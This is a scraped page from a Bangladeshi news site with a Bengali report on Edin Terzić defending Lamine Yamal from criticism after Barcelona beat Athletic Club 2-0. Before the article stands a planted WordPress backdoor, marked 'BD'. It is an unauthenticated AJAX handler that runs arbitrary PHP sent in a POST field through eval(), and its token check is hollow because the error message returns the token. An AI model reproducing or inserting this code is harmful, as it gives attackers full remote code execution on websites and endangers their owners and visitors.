// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== ইয়ামালকে নিয়ে সমালোচনায় ‘সাবধান’ হতে বললেন তেরজিচ | potrikaybangladesh.com
Tuesday, September 22, 2026
Homeইয়ামালকে নিয়ে সমালোচনায় ‘সাবধান’ হতে বললেন তেরজিচ

ইয়ামালকে নিয়ে সমালোচনায় ‘সাবধান’ হতে বললেন তেরজিচ

তিন সপ্তাহের বিশ্রাম শেষে মাঠে ফিরেছেন লামিন ইয়ামাল। তবে ফিরতেই যেন প্রত্যাশার চাপটা আরও বেড়ে গেছে বার্সেলোনার তরুণ তারকার ওপর। অ্যাথলেটিক ক্লাবের বিপক্ষে জয়ের ম্যাচেও গোল বা অ্যাসিস্ট না পাওয়ায় তাকে ঘিরে সমালোচনা শুরু হয়েছে। তবে এমন সমালোচনাকে অযৌক্তিক বলেই মনে করছেন অ্যাথলেটিক ক্লাবের কোচ এদিন তেরজিচ।

বৃহস্পতিবার লা লিগায় অ্যাথলেটিক ক্লাবকে ২-০ গোলে হারিয়েছে বার্সেলোনা। ক্যাম্প ন্যুতে স্বাগতিকদের হয়ে গোল দুটি করেন রাফিনিয়া ও ফেরমিন লোপেজ। ম্যাচ শেষে স্বাভাবিকভাবেই আলোচনায় আসে ইয়ামালের পারফরম্যান্সও।

তবে ইয়ামালকে নিয়ে সমালোচনার প্রশ্ন উঠতেই তার পক্ষ নেন তেরজিচ। বার্সেলোনার ১৯ বছর বয়সী তারকার কাছ থেকে প্রতি ম্যাচে অবিশ্বাস্য পারফরম্যান্স আশা না করার আহ্বান জানান তিনি।

‘সে তিন সপ্তাহ বিশ্রামে ছিল, আর আমরা আশা করছি ফিরে এসেই সে প্রতি সপ্তাহে পাঁচটি করে গোল করবে। আমাদের সমালোচনার ক্ষেত্রে আরও সতর্ক হতে হবে,’ ম্যাচ শেষে সাংবাদিকদের বলেন তেরজিচ।

ইয়ামালের ওপর অতিরিক্ত প্রত্যাশার বিষয়টি অবশ্য নতুন নয়। অল্প বয়সেই বার্সেলোনার অন্যতম প্রধান তারকা হয়ে ওঠার পাশাপাশি স্পেনের হয়েও গুরুত্বপূর্ণ দায়িত্ব পালন করছেন তিনি। ফলে প্রতিটি ম্যাচেই তার কাছ থেকে গোল, অ্যাসিস্ট কিংবা ম্যাচজয়ী পারফরম্যান্সের প্রত্যাশা তৈরি হয়েছে।

অ্যাথলেটিক ক্লাবের কোচের মন্তব্যের সঙ্গে অনেকটাই সুর মিলেছে বার্সেলোনা কোচ হান্সি ফ্লিকের কথাতেও। ব্যস্ত গ্রীষ্ম এবং গত মৌসুমের শেষ দিকে চোটের ধকল কাটিয়ে ফেরা ইয়ামালকে কেন পুরো ৯০ মিনিট মাঠে রেখেছিলেন, সেটিও ব্যাখ্যা করেছেন জার্মান কোচ।

ফ্লিকের মতে, ম্যাচের পুরো সময় মাঠে থাকা ইয়ামালের জন্য শারীরিকভাবে গুরুত্বপূর্ণ ছিল। ‘আমার মনে হয়, লামিনের জন্য ৯০ মিনিট খেলা ভালো হয়েছে। এ ধরনের পরিস্থিতিতে আমরা শারীরিক দিকটাও আরও উন্নত করার চেষ্টা করি। আজ এটাই ছিল আমাদের পরিকল্পনা,’ বলেন ফ্লিক।

ম্যাচের শেষ দিকে অবশ্য ইয়ামালসহ দুই দলের খেলোয়াড়দের ক্লান্তি স্পষ্ট হয়ে উঠেছিল। তবে সেটিকে স্বাভাবিক হিসেবেই দেখছেন বার্সেলোনা কোচ, ‘অবশ্যই, শেষ দিকে আপনি দেখতে পেয়েছেন সব খেলোয়াড়ই খুব ক্লান্ত হয়ে পড়েছিল। কিন্তু এটা স্বাভাবিক। এটাই ফুটবল, আর আমরা নিজেদের সবটুকু দিয়ে খেলি।’

তবে ইয়ামাল ও বার্সেলোনার সামনে এখন খুব বেশি বিশ্রামের সুযোগ নেই। সোমবার রাতে লা লিগায় রায়ো ভায়েকানোর বিপক্ষে মাঠে নামবে তারা।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments